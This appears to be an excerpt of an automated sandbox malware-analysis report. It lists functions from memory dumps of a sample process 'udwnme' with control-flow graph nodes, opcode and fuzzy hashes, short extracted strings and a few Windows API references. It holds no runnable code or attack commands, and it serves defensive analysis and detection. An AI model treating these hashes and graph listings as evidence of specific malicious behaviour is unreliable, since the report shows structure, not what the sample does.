                                                                    • API ID:
                                                                    • String ID: fkq
                                                                    • API String ID: 0-1814508662
                                                                    • Opcode ID: 13603e970c2d7732668679e918caecf536d914a1f42a31249dab7a9eeb678b66
                                                                    • Instruction ID: 30701f9341de32969c6a6798c46f9b84c8d85ecfb23276f06fde01cd365801e6
                                                                    • Opcode Fuzzy Hash: 13603e970c2d7732668679e918caecf536d914a1f42a31249dab7a9eeb678b66
                                                                    • Instruction Fuzzy Hash: F952DCB4A10209DBDB069FF4D494B9EBB72EB88300F109069EA4533795CB396CD1EB65
                                                                    Function 0147CB98 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 687 147cb98-147cbb9 688 147cbc7-147cbcb 687->688 689 147cbbb-147cbbf 687->689 690 147cbd1-147cbd4 688->690 691 147d22a 688->691 689->691 692 147cbc5 689->692 693 147d22f-147d234 690->693 694 147cbda-147cbe2 690->694 691->693 692->690 701 147d239-147d240 693->701 695 147cbe4-147cbe7 694->695 696 147cbf2-147cc0e call 147cab8 694->696 697 147cbed 695->697 698 147ccbc-147cce0 call 147cab8 695->698 705 147cc10-147cc26 call 147cab8 696->705 706 147cc8b-147ccb7 call 147cab8 696->706 697->701 707 147cce2-147ccf2 698->707 708 147ccfd-147cd0b 698->708 716 147cc58-147cc7d call 147cab8 705->716 717 147cc28-147cc2c 705->717 706->701 714 147ccfb 707->714 708->691 711 147cd11-147cd13 708->711 711->691 715 147cd19-147cd1b 711->715 720 147cd35-147cd47 714->720 715->691 721 147cd21-147cd2d 715->721 738 147cc85-147cc89 716->738 717->716 722 147cc2e-147cc4e call 147cab8 717->722 723 147cd59-147cd76 call 147cab8 720->723 724 147cd49 720->724 721->720 832 147cc50 call 147cb88 722->832 833 147cc50 call 147cb98 722->833 735 147cd7e-147cd8d 723->735 736 147cd78-147cd7c 723->736 724->701 729 147cd4f-147cd53 724->729 729->701 729->723 737 147cd90-147cda0 735->737 736->735 736->737 830 147cda3 call 147d2d1 737->830 831 147cda3 call 147d2e0 737->831 738->705 738->706 739 147cc56 739->738 741 147cda9-147ce22 747 147ce25-147ce4d 741->747 747->693 750 147ce53-147ce71 747->750 751 147ce73 750->751 752 147ce7a-147ce83 750->752 755 147ced5-147cee6 751->755 756 147ce75-147ce78 751->756 753 147ce85-147ceab 752->753 754 147cead-147ced3 752->754 763 147cf16-147cf1f 753->763 754->763 757 147cef4-147cef8 755->757 758 147cee8-147ceec 755->758 756->752 756->755 757->691 762 147cefe-147cf01 757->762 758->691 761 147cef2 758->761 761->762 762->693 764 147cf07-147cf0f 762->764 763->693 765 147cf25-147cf3a 763->765 764->763 765->747 766 147cf40-147cf44 765->766 767 147cf46-147cf4a 766->767 768 147cf4c-147cf50 766->768 767->768 769 147cf60-147cf64 767->769 770 147d087-147d093 768->770 771 147cf56-147cf5a 768->771 772 147cf66-147cf6a 769->772 773 147cfc5-147cfc9 769->773 770->693 774 147d099-147d0aa 770->774 771->769 771->770 772->773 775 147cf6c-147cf78 772->775 777 147d027-147d02b 773->777 778 147cfcb-147cfcf 773->778 774->693 776 147d0b0-147d0b7 774->776 775->693 780 147cf7e-147cf99 775->780 776->693 781 147d0bd-147d0c4 776->781 777->770 782 147d02d-147d031 777->782 778->777 779 147cfd1-147cfdd 778->779 779->693 783 147cfe3-147cffe 779->783 780->693 790 147cf9f-147cfa7 780->790 781->693 784 147d0ca-147d0d1 781->784 782->770 785 147d033-147d03f 782->785 783->693 792 147d004-147d00c 783->792 784->693 787 147d0d7-147d0ea call 147cab8 784->787 785->693 788 147d045-147d060 785->788 798 147d0ec-147d0f0 787->798 799 147d14a-147d14e 787->799 788->693 796 147d066-147d06e 788->796 790->693 793 147cfad-147cfc0 790->793 792->693 797 147d012-147d025 792->797 793->770 796->693 800 147d074-147d07f 796->800 797->770 798->799 804 147d0f2-147d0fe 798->804 801 147d150-147d154 799->801 802 147d1ab-147d1af 799->802 800->770 801->802 808 147d156-147d162 801->808 805 147d202-147d217 802->805 806 147d1b1-147d1b5 802->806 804->693 809 147d104-147d12c 804->809 813 147d219 805->813 814 147d228 805->814 806->805 811 147d1b7-147d1c3 806->811 808->693 812 147d168-147d190 808->812 809->693 820 147d132-147d145 809->820 811->693 817 147d1c5-147d1ed 811->817 812->693 823 147d196-147d1a9 812->823 813->723 819 147d21f-147d222 813->819 814->701 817->693 825 147d1ef-147d1fa 817->825 819->723 819->814 820->805 823->805 825->805 830->741 831->741 832->739 833->739
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d
                                                                    • API String ID: 0-2564639436
                                                                    • Opcode ID: 88d1f882544d0ba8133a17cf6fcca567d99765d459c473c6df256f7f055e07e7
                                                                    • Instruction ID: 8e7a2f32cf34930caa2994184f76c600404356f4e57220dd419a371f73d09d66
                                                                    • Opcode Fuzzy Hash: 88d1f882544d0ba8133a17cf6fcca567d99765d459c473c6df256f7f055e07e7
                                                                    • Instruction Fuzzy Hash: 5B321770A0060ADFDB15CFA9D984BAEFBB2FF84314F14861AE41597765D730E896CB80
                                                                    Function 05400B11 Relevance: 1.6, APIs: 1, Instructions: 69libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 834 5400b11-5400b5b 837 5400b62-5400b75 LdrInitializeThunk 834->837 838 5400b7c-5400b83 837->838 839 5400b85-5400bb9 838->839 840 5400bcb-5400be4 838->840 839->840 849 5400bbb-5400bc5 839->849 842 5400be6 840->842 843 5400bef 840->843 842->843 845 5400bf0 843->845 845->845 849->840
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 07e39ca7b9950a5a48175a9a52b70d251758ed7a8fb9dd9c90225f6db78c9d5b
                                                                    • Instruction ID: e4d343edfb40cd964e823809914b309a2ed031c284c11c7dc1f7a36205e9fe5a
                                                                    • Opcode Fuzzy Hash: 07e39ca7b9950a5a48175a9a52b70d251758ed7a8fb9dd9c90225f6db78c9d5b
                                                                    • Instruction Fuzzy Hash: C7216D317002158FCB55EF64C558BAE77F6EB89304F2045BAD406AB3A9DB798C42CB81
                                                                    Function 01471380 Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dLlq
                                                                    • API String ID: 0-46837485
                                                                    • Opcode ID: 80cd46c2089d8aacdd5a4fc9801c8bcb92a93f6e7c10e80a0472ec5947987302
                                                                    • Instruction ID: 814b50c6157907c03012f2ba3ef2c6a4b59778b9f3299b8a365a31f72224a0c6
                                                                    • Opcode Fuzzy Hash: 80cd46c2089d8aacdd5a4fc9801c8bcb92a93f6e7c10e80a0472ec5947987302
                                                                    • Instruction Fuzzy Hash: 1BB1B07180A3915FCB079B7884A46E97FB0AF47624F4D45EBC4819F1B3DA384D89C7A1
                                                                    Function 01475AB4 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl
                                                                    • API String ID: 0-3439240617
                                                                    • Opcode ID: 7f2f4dbf0856049823ed9553e03e7f5a88a7df7eacf659b1460dca283de0aeff
                                                                    • Instruction ID: 450275d109fa18a757b68644a7e0a015d6b6e92895deb1f986856339fa2012ab
                                                                    • Opcode Fuzzy Hash: 7f2f4dbf0856049823ed9553e03e7f5a88a7df7eacf659b1460dca283de0aeff
                                                                    • Instruction Fuzzy Hash: B3B11C70E002098FDB14CFA9D9857EEBBF1AF88714F14852AD415AF364EB749846CF91
                                                                    Function 05400A6A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserExceptionDispatcher.NTDLL ref: 05400A89
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: DispatcherExceptionUser
                                                                    • String ID:
                                                                    • API String ID: 6842923-0
                                                                    • Opcode ID: 59446ed96e9321030cb2cae62c5b58fa7d9bd8ea78aaa2278af30046c61e2c3d
                                                                    • Instruction ID: 5fa63eb1f1e7e99b2f48826cc41fbc1388486cfd49c4f4a97fdc73a97ebda859
                                                                    • Opcode Fuzzy Hash: 59446ed96e9321030cb2cae62c5b58fa7d9bd8ea78aaa2278af30046c61e2c3d
                                                                    • Instruction Fuzzy Hash: 55E03936901634DFCB26DB94E958BEDF375FBA4311F51A132C40A576848B306892CF81
                                                                    Function 05400A7C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserExceptionDispatcher.NTDLL ref: 05400A89
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: DispatcherExceptionUser
                                                                    • String ID:
                                                                    • API String ID: 6842923-0
                                                                    • Opcode ID: d5ea1bef9befa3d59d163a2472069043e012978de8a2b4d0dae7f3ef685b60c9
                                                                    • Instruction ID: 482aabfc9be36cd33ee7327439849635d798240f6a105209aad0ce6d4450b494
                                                                    • Opcode Fuzzy Hash: d5ea1bef9befa3d59d163a2472069043e012978de8a2b4d0dae7f3ef685b60c9
                                                                    • Instruction Fuzzy Hash: 31E01A32901A34DBCB25CB84E9587EDB3B5FB94311F509132C44A57584C7306992CF80
                                                                    Function 01478651 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-2299363055
                                                                    • Opcode ID: ff8d2a03b70cac40c2e2e456d230027cedcb52ce73fa5da9b7167392c355fe9d
                                                                    • Instruction ID: ae1fa4e1313724379f7963c52571c9e299011f6ffce7ff3669e3911295e023f2
                                                                    • Opcode Fuzzy Hash: ff8d2a03b70cac40c2e2e456d230027cedcb52ce73fa5da9b7167392c355fe9d
                                                                    • Instruction Fuzzy Hash: A6518370E0060A8BCB15DF69C95459EBBB2FF85300F20852ED816AB365DB34AD46CB80
                                                                    Function 014785FD Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-2299363055
                                                                    • Opcode ID: 6478bcceef16a51ca33605290d62e02b1077ba81602b4b979744431f018155e0
                                                                    • Instruction ID: 28f7f24a4e1422fd7920c4467e02fef4eea5cc9603fb02f1fb2e36c35e85b64b
                                                                    • Opcode Fuzzy Hash: 6478bcceef16a51ca33605290d62e02b1077ba81602b4b979744431f018155e0
                                                                    • Instruction Fuzzy Hash: 3B41A270E006068FCB19DFB9C95459EBBB2FF95300F20856ED416AB365DB34AD46CB40
                                                                    Function 0147860D Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-2299363055
                                                                    • Opcode ID: 39ccc7da0ee5e04a968de2bdd473953c690e1a6fb58e85109d8dd3805fd8b737
                                                                    • Instruction ID: 7f3c627fec85f83caccb654742bdd97bc16c940fb76070e7c9b04ef8b2b386bb
                                                                    • Opcode Fuzzy Hash: 39ccc7da0ee5e04a968de2bdd473953c690e1a6fb58e85109d8dd3805fd8b737
                                                                    • Instruction Fuzzy Hash: 28419070E0060A8FC719DFB9C95459EBBB2BF99304F20856ED416AB365DB34EC46CB40
                                                                    Function 0147861F Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-2299363055
                                                                    • Opcode ID: 1e51ca77deb2ef376e180c83ef4c5f70d571eece29dd914af3d2c651f7457665
                                                                    • Instruction ID: bdcbea7b76c0ff43a73193a27c5e03bb7c27d46a8cc345078f51a9f554e057cd
                                                                    • Opcode Fuzzy Hash: 1e51ca77deb2ef376e180c83ef4c5f70d571eece29dd914af3d2c651f7457665
                                                                    • Instruction Fuzzy Hash: 53418271A006068FC719DF69C99459EBBB2FF95300F20852ED416AB365DF34ED46CB81
                                                                    Function 01471BD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRfq
                                                                    • API String ID: 0-2333822924
                                                                    • Opcode ID: 013cc4b3faadc8cab434414f502c6b4bff517c108ceb8f9fb7284c1d649d22f9
                                                                    • Instruction ID: 9f0f1a106902a20e86dccff1deb076d588e01d88e9eecd28aaf25074e08eb3a2
                                                                    • Opcode Fuzzy Hash: 013cc4b3faadc8cab434414f502c6b4bff517c108ceb8f9fb7284c1d649d22f9
                                                                    • Instruction Fuzzy Hash: 9631B170F002168FCB58EBB985509AFBBF6BF89610B14416ED516EB3A4EE349C42C791
                                                                    Function 014715A8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dLlq
                                                                    • API String ID: 0-46837485
                                                                    • Opcode ID: ee89dca85938d894f1729f0e4ba1ba0028962a371a0f618bc6a21406e3d1a0f7
                                                                    • Instruction ID: f3c0d727610cda31da69003141d174dce7df04c1e4d770020a4888e9a7f357bd
                                                                    • Opcode Fuzzy Hash: ee89dca85938d894f1729f0e4ba1ba0028962a371a0f618bc6a21406e3d1a0f7
                                                                    • Instruction Fuzzy Hash: 5631A375A002058FDB15DF69C498AEEBBF2FF48700F1485AAE405AB3B1CB749D45CB51
                                                                    Function 014716D7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq
                                                                    • API String ID: 0-3368716452
                                                                    • Opcode ID: 44fd0ce9f1c35142539c702b99ddd70a9823f9d32ae350037fe454de5078db4f
                                                                    • Instruction ID: cce1067b2109c5c09b1323e075750b5fc977e69238935dbd053038aec5e04929
                                                                    • Opcode Fuzzy Hash: 44fd0ce9f1c35142539c702b99ddd70a9823f9d32ae350037fe454de5078db4f
                                                                    • Instruction Fuzzy Hash: 5AF0F4347082804FC38A573D64205AE3FE6AFDB25031944FAD14ACB3A6CD294C07C7A1
                                                                    Function 01471F3F Relevance: .8, Instructions: 788COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cf74ed9cd997f74be30fffc4ba4b6b025f0803de280f59e077478c4d668a0b37
                                                                    • Instruction ID: ed9908a5bb12a1fb758e7cf2915256e243d1a2fdb459744040b66e450c89be7a
                                                                    • Opcode Fuzzy Hash: cf74ed9cd997f74be30fffc4ba4b6b025f0803de280f59e077478c4d668a0b37
                                                                    • Instruction Fuzzy Hash: 3D72ABB1E102198FDBA8DBA4C9547DEBBB6BF88300F1040A9D14A6B3A4DF345E85DF51
                                                                    Function 01471F50 Relevance: .8, Instructions: 780COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f51dd45fbe6d9d975a4da1e2f33dc54b6bdea06d3f7e1cfa556e00a8289f696a
                                                                    • Instruction ID: cdf95e996c8f0afec0925b2ec6f203e74e3db853e20d5c53c97564cc10eb1fe3
                                                                    • Opcode Fuzzy Hash: f51dd45fbe6d9d975a4da1e2f33dc54b6bdea06d3f7e1cfa556e00a8289f696a
                                                                    • Instruction Fuzzy Hash: 8172ABB1D102198FDBA8DBA4C9547DEBBB6BF88300F1040A9D24A6B3A4DF345E85DF51
                                                                    Function 0147AA08 Relevance: .3, Instructions: 304COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9e80c79e9dc86198c1e4871bc23df3b696bfeb826f4dd2892fb659af0f1d12f
                                                                    • Instruction ID: 5c0dcea0fa12338bb693ac4607916507d4a91b1cfe2a2f28802b6e0f0d0b0b77
                                                                    • Opcode Fuzzy Hash: a9e80c79e9dc86198c1e4871bc23df3b696bfeb826f4dd2892fb659af0f1d12f
                                                                    • Instruction Fuzzy Hash: 2BB1D574B093854FCB02DB74D9A45EDBFB2EF8A210B1988D7C4419B3A7DA385C46CB91
                                                                    Function 01476385 Relevance: .3, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b6500f37b551b6baf90fb1c2dc5b1a6feeb8ac60b503742498f85e7a5d30afd
                                                                    • Instruction ID: fc164080e12c59b4062b65916838453faaba0c83472ce367d4fc4f9b6ae2cb7d
                                                                    • Opcode Fuzzy Hash: 1b6500f37b551b6baf90fb1c2dc5b1a6feeb8ac60b503742498f85e7a5d30afd
                                                                    • Instruction Fuzzy Hash: 7BB13F70E00609CFEB10CFA9D9857DEBBF2AF48714F15812AD818E7364EB749845CB91
                                                                    Function 0147D598 Relevance: .2, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 83a0ada3478db82f087d53920fc3badb35d9f908850227ef27fd0f5549837736
                                                                    • Instruction ID: 3796856ea8ab3e13624b2d8f7cc630361a771b8626ddcc64a27dfc48be27f35d
                                                                    • Opcode Fuzzy Hash: 83a0ada3478db82f087d53920fc3badb35d9f908850227ef27fd0f5549837736
                                                                    • Instruction Fuzzy Hash: 04617271F002159FDB05DBB8C540AAEBBF6AF88314F248169D4559B3A6DB31EC42CB94
                                                                    Function 01477E29 Relevance: .2, Instructions: 171COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85284d28f31607dfe946bde41ed84b31dc5b7289c0edaa4b2a18acfc4b25f9c4
                                                                    • Instruction ID: cd0c671a48d30ffdf6d9672110f2ceea2f94a373d5fcacba9e1f8755684a7982
                                                                    • Opcode Fuzzy Hash: 85284d28f31607dfe946bde41ed84b31dc5b7289c0edaa4b2a18acfc4b25f9c4
                                                                    • Instruction Fuzzy Hash: 9D61B734F0420ACBCB58DFB4F5AC56E77B2FB85341B509969D412AB3E8DA385C42DB81
                                                                    Function 01472F30 Relevance: .2, Instructions: 170COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 210b1583cca9b4e09010e6c42d4edfd6e2b0b53e354eba5672a475d106efb33c
                                                                    • Instruction ID: 776d272dfd75b4fc98381b834165fbef349345d8488d2905951b64058d3a7079
                                                                    • Opcode Fuzzy Hash: 210b1583cca9b4e09010e6c42d4edfd6e2b0b53e354eba5672a475d106efb33c
                                                                    • Instruction Fuzzy Hash: FF51B270B102159FCB1A9FB8D45475E7BB7EF88300F14846AE945EB3A4CF789C829B91
                                                                    Function 01477E38 Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c05b88b4890587ad0b52f9b9f670baf626e941e2b6ed8b911826c7555fac6456
                                                                    • Instruction ID: 109ad910dc6a173d2f3816dec0f310121e5af156a797f0a20452fa333d966df7
                                                                    • Opcode Fuzzy Hash: c05b88b4890587ad0b52f9b9f670baf626e941e2b6ed8b911826c7555fac6456
                                                                    • Instruction Fuzzy Hash: 4061B634F0420ACBCB58DFB4F5AC56E77B2FB85341B509969D412AB3A8DA385C429F81
                                                                    Function 0147AE40 Relevance: .2, Instructions: 164COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6561c67ce6e93eda0b2a603a9efddfa106b5445af1e0cad43ab944a8f5087085
                                                                    • Instruction ID: 47842a78ab18ce5e43740dc84c396dc2e75c9459588db3428e5dc985b7382763
                                                                    • Opcode Fuzzy Hash: 6561c67ce6e93eda0b2a603a9efddfa106b5445af1e0cad43ab944a8f5087085
                                                                    • Instruction Fuzzy Hash: 41516DB4B002098FCB15DF68D8949AEFBF1FB88310B14856AE91AD7355DB31AC46CB41
                                                                    Function 0147D2E0 Relevance: .2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1dd8aca398e03525b93461790a305b54d3998b576d626767184e83bc64f0e0cc
                                                                    • Instruction ID: d36dd5abaf068cef706dfecb9d6ab53734c4a627627af7b0bfaec3fd758ffcae
                                                                    • Opcode Fuzzy Hash: 1dd8aca398e03525b93461790a305b54d3998b576d626767184e83bc64f0e0cc
                                                                    • Instruction Fuzzy Hash: 0D518F31E205158BCB19CBA9C5806FEFBF2AFC4314F59852AD446AB656C734BC80CB94
                                                                    Function 0147EB21 Relevance: .2, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 35285f229e3dfc0b5c2639b60b31a2c726809485cd56e981c22e807eba044ef1
                                                                    • Instruction ID: f5c231e12ec763bb8a6663964539eaf1e69ee2ac9dce3e4fc9ecbd25c787b260
                                                                    • Opcode Fuzzy Hash: 35285f229e3dfc0b5c2639b60b31a2c726809485cd56e981c22e807eba044ef1
                                                                    • Instruction Fuzzy Hash: C5515D74F001058FCB44EF79D5946AEBBF6FB88210B248569D409E7359EB389D82CF91
                                                                    Function 01477E68 Relevance: .2, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_1470000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 308a9a5b97668ce387fac400ea989a9f8e51e9a67b7fa17cb1c74666ff0fd8ca
                                                                    • Instruction ID: 5198429b36a14c237912eb8e4854c5587347849e642a54b8253cbd1e1c011d65
                                                                    • Opcode Fuzzy Hash: 308a9a5b97668ce387fac400ea989a9f8e51e9a67b7fa17cb1c74666ff0fd8ca
                                                                    • Instruction Fuzzy Hash: 4E51B634F0420A8BCB58DFB4F5AC56E77B2FB85341B509969D412AB3E8DE385C429B81
                                                                    Function 01472F60 Relevance: .1, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2918580974.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
